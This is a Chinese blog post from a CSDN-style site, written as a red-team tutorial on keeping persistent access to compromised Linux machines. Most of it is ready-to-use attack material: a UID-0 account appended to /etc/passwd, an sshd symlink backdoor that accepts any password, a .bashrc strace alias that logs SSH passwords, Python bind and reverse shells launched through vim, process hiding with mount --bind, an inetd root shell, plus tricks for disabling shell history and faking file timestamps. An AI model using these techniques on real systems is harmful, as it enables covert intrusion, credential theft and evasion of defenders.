linux权限维持

最新推荐文章于 2023-06-24 11:21:06 发布
最新推荐文章于 2023-06-24 11:21:06 发布
阅读量3k 收藏 31
点赞数 8
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122675654
版权

目录

修改文件/终端属性

文件创建时间

如果蓝队根据文件修改时间来判断文件是否为后门,解决方法:使用 touch

touch命令有两个功能:一是创建新的空文件,二是改变已有文件的时间戳属性。

在这里插入图片描述

文件锁定

在Linux中,使用 chattr 命令来防止root和其他管理用户误删除和修改重要文件及目录,此权限用ls -l是查看不出来的,从而达到隐藏权限的目的。

sudo chattr +i 1.php	# 锁定文件
rm -fr 1.php					# 不能删除
lsattr 1.php					# 查看文件属性
sudo chattr -i 1.php	# 解锁文件

在这里插入图片描述

历史操作命令

在shell中执行的命令,不希望被记录在命令行历史中,如何在linux中开启无痕操作模式呢?
技巧一:只针对你的工作关闭历史记录

[space]set +o history 	# 备注:[space] 表示空格。并且由于空格的缘故,该命令本身也不会被记录

上面的命令会临时禁用历史功能,这意味着在这命令之后你执行的所有操作都不会记录到历史中,然而这个命令之前的所有东西都会原样记录在历史列表中。

要重新开启历史功能,执行下面的命令:

[Space]set -o history 	# 将环境恢复原状

在这里插入图片描述

技巧二:从历史记录中删除指定的命令
在这里插入图片描述

passwd增加用户

背景知识

在这里插入图片描述

实操-增加超级用户

  1. 生成密码passwd的盐值:perl -le 'print crypt("passwd","salt")'
  2. 复制下来root用户的passwd信息,得知新用户asuka的passwd信息:

echo "asuka:sadtCr0CILzv2:0:0:/root:/bin/bash" >> /etc/passwd

  1. 尝试切换用户为asuka,身份是root

在这里插入图片描述

  1. 尝试以asuka的身份ssh连接靶机

在这里插入图片描述

SSH后门

SSH 软连接后门

软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 检测uid 为 0 即可认证成功,这样就导致了可以使用任意密码登录。

说明:建立软连接到/usr/local/su 文件,也可以在其他目录,su文件名字不能变,变了就无法登录。当然可以通过其他设置,更改su名字也是可以的。然后启动,并指定监听12345端口,登录的时候密码随意即可

  1. 通过软连接建立一个ssh后门:ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
  2. ssh连接:ssh kali@192.168.40.129 -p12345

在这里插入图片描述

SSH 公钥免密码登陆

这个是老生常谈的公钥免登陆,这种用法不只是用在留后门,还可以在一些特殊情况下获取一个交互的shell,如struts写入公钥,oracle写入公钥连接,Redis未授权访问等情景。

  1. 生成公钥: ssh-keygen -t rsa

在这里插入图片描述

  1. 将id_rsa.pub内容放到目标.ssh/authorized_keys里:cat id_rsa.pub > authorized_keys
  2. 获取id_rsa文件

在这里插入图片描述

  1. 设置权限:

注意,因为Ubuntu是以web2用户身份创建的SSH公钥,因此kali只有以web2用户的身份连接它才不需要密码。

chmod 600 id_rsa
ssh -i id_rsa web2@192.168.40.146

在这里插入图片描述

SSH Keylogger记录密码

当前系统如果存在strace的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。倘若当前系统不存在alias,那么就会影响其正常使用。

  1. 在当前用户的 .bashrc 里新建一条alias,这样可以抓取他登陆其他机器的 ssh 密码。
vim .bashrc
alias ssh='strace -o /tmp/.sshpwd-`date '+%Y-%m-%d'`.log -e read,write,connect -s2048 ssh' 
source .bashrc		# 重新执行刚修改的初始化文件

在这里插入图片描述

  1. Ubuntu登录别的设备

在这里插入图片描述

  1. 查收战果:grep -A 9 'password' .sshpwd-2022-01-24.log

在这里插入图片描述

在这里插入图片描述

Ubuntu利用Cron机制安装后门

Cron是ubuntu下默认启动的用户执行计划。它会按照设置,在固定的周期或者按照一定时间执行某一个任务。它是一项服务,你可以使用基本的服务查看状态命令等查看信息。
操作参见:Linux学习之Ubuntu利用Cron机制安装后门

vim python 扩展后门

适用于安装了vim且安装了python扩展(绝大版本默认安装)的linux系统。

  1. 在目标设备上创建恶意py文件

恶意脚本 dir.py 的内容可以是任何功能的后门,比如监听本地的11端口。建议使用正向后门。
正向后门:

# from https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
from socket import *
import subprocess
import os, threading, sys, time

if __name__ == "__main__":
    server = socket(AF_INET, SOCK_STREAM)
    server.bind(('0.0.0.0', 11))
    server.listen(5)
    print('waiting for connect')
    talk, addr = server.accept()
    print('connect from', addr)
    proc = subprocess.Popen(["/bin/sh", "-i"], stdin=talk, stdout=talk, stderr=talk, shell=True)

反向后门:

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.241.128", 6666))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
  1. 运行后门

有下面两种方式,第二种比较绝,实验效果不好,还是用第一种吧

(nohup vim -E -c "py3file dir.py"> /dev/null 2>&1 &) && sleep 2
(nohup vim -E -c "py3file dir.py"> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

在这里插入图片描述

  1. kali连接目标

在这里插入图片描述

  1. 隐藏进程

11端口运行个vim太引人注目了,需要隐藏。mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。

mkdir null
mount --bind null /proc/3052
netstat -antplu | grep 11

在这里插入图片描述

inetd服务后门

inetd是一个监听外部网络请求(就是一个socket)的系统守护进程,默认情况下为13端口。当inetd接收到一个外部请求后,它会根据这个请求到自己的配置文件中去找到实际处理它的程序,然后再把接收到的这个socket交给那个程序去处理。所以,如果我们已经在目标系统的inetd配置文件中配置好,那么来自外部的某个socket是要执行一个可交互的shell,就获取了一个后门。

  1. 安装inetd:apt install openbsd-inetd

在这里插入图片描述

  1. 修改inetd默认端口
vim /etc/services
woot 6666/tcp		# 随便起个名字和端口

在这里插入图片描述

  1. 修改 inetd 配置文件
vim /etc/inetd.conf
woot stream tcp nowait root /bin/bash bash -i

在这里插入图片描述

  1. 确认端口开启

在这里插入图片描述

  1. kali连接目标

在这里插入图片描述

协议后门

在一些访问控制做的比较严格的环境中,由内到外的TCP流量会被阻断掉。但是对于UDP(DNS、ICMP)
相关流量通常不会拦截。

ICMP

主要原理就是利用ICMP中可控的data字段进行数据传输,具体原理请参考: https://zhuanlan.zhihu.com/p/41154036
开源工具:ICMP后门项目地址:https://github.com/andreafabrizi/prism

DNS

在大多数的网络里环境中IPS/IDS或者硬件防火墙都不会监控和过滤DNS流量。主要原理就是将后门载荷
隐藏在拥有PTR记录和A记录的DNS域中(也可以利用AAAA记录和IPv6地址传输后门),具体请参考:
通过DNS传输后门来绕过杀软
开源工具:DNS后门项目地址:https://github.com/DamonMohammadbagher/NativePayload_DNS

协议后门检测

对于DNS/ICMP这种协议后门,直接查看网络连接即可,因为在使用过程中会产生大量的网络连接。
清除:kill进程、删除文件即可

PAM后门

参见:LINUX留后门–教程(六)—— PAM后门

参考

Linux学习之Ubuntu利用Cron机制安装后门
python正向连接后门
LINUX留后门–教程(六)—— PAM后门
[总结]Linux权限维持

lainwith
关注
  • 8
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Linux权限维持
小丁长不胖
07-22 258
一:适配方法 1:后门账户 可疑用户排查: 2:SUID Shell Suid shell是一种可用于以拥有者权限运行的shell。 可疑排查: 3:公私钥免密登录 在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 客户端与服务端执行: ssh-keygen -t rsa #过程中按三次回车 其中 id_rsa为私钥,id_rsa.pub为公钥,接
linux权限维持.pdf
03-31
Linux权限维持是信息安全领域内一个关键的话题,特别是在对Linux系统进行入侵测试或实际遭受攻击后,保持对系统的访问权限是一个常见需求。以下是关于Linux权限维持的详细介绍: 首先,Linux系统权限维持的方法通常...
LINUX权限维持
最新发布
m0_65096687的博客
06-24 641
添加超级用户的方式有很多种,这里直接拿到root权限后创建一个用户,在/etc/passwd/中修改用户id值为0。Linux提权操作中有个suid提权。在对方主机中查看是否又以下文件·第一个星号是分钟,这里没有加就是过一会就执行。得到对方主机权限后,在目录中写入命令执行脚本。然后就可以利用suid提权来权限维持。拿到对方的root权限后,关闭防火墙。把这些文件加上SUID。然后攻击机开启nc监听。然后在计划任务中配置。
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
这篇速查表主要列举了多种利用SUID权限维持的方法,这些方法大多涉及通过不同的命令或者脚本启动一个shell,以获得root权限。以下是一些示例: 1. `chmod u+s program`: 这个命令将SUID权限赋予名为`program`的文件...
linux源码分析
10-11
### Linux源码分析——安全与防御视角 #### 一、概述 Linux作为一款开源操作系统,因其高度的灵活性和稳定性而受到广泛欢迎。然而,这也使其成为黑客和...此外,定期备份和更新系统也是维持系统安全的关键措施之一。
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
Linux Polkit 权限提升漏洞(CVE-2021-4034)在 CentOS/RHEL 6 修复升级的 rpm 离线包
02-09
Linux Polkit,也称为 PolicyKit...总之,Linux Polkit是系统权限管理的关键组件,而CVE-2021-4034的修复对于维持CentOS/RHEL 6系统的安全性至关重要。及时更新和妥善管理这些组件可以有效地保护服务器免受潜在的攻击。
linux+安装clickhouse.doc
11-24
Linux环境中安装ClickHouse是一个涉及多个步骤的过程,ClickHouse是一个高性能的开源列式数据库管理系统(DBMS),主要用于在线分析处理(OLAP)。以下是对安装过程的详细解释: 1. **用户与用户组创建**: 在...
linux memcache安装配置方法
09-15
libevent采用非阻塞I/O模型,即使面对大量并发连接,也能维持O(1)的时间复杂度,确保了系统的高效运行。 安装配置Memcache的步骤如下: 1. 安装依赖库:首先需要安装libevent及其开发库,可以通过包管理器(如`yum...
Linux提权的简单总结1
08-03
4. **持久化**:创建后台服务、定时任务或隐藏进程以维持权限。 5. **进一步渗透**:利用新获取的权限访问更深层的系统资源。 在Linux提权中,了解文件权限、系统信息、用户账户管理和内核漏洞是关键。在实践中,要...
内网渗透 - 权限维持 - Linux
weixin_30855099的博客
08-22 296
1.预加载型动态链接库后门2.strace后门3.ssh后门4.OpnenSSH后门5.sshd软链接后门6.wrapper后门7.SUID后门8.inetd服务后门9.协议后门10.vim后门11.PAM后门12.进程注入13.Rootkit 转载于:https://www.cnblogs.com/AtesetEnginner/p/11397184.html...
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来获取用户的权限,例如伪装成管理员向用户索取密码或其他敏感信息。 4. 后门攻击:攻击者在系统中植入后门程序,以便在以后可以随时获取权限。 5. 特权提升攻击:攻击者利用系统中的漏洞或配置错误,将自己的权限提升到更高的级别。 为了防止权限维持攻击,可以采取以下措施: 1. 及时升级系统和软件,修补漏洞。 2. 确保所有用户和管理员都使用强密码,并定期更换密码。 3. 加强身份验证和授权控制。 4. 使用安全的文件权限和访问控制策略。 5. 定期审查系统日志,以便及时发现异常行为。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值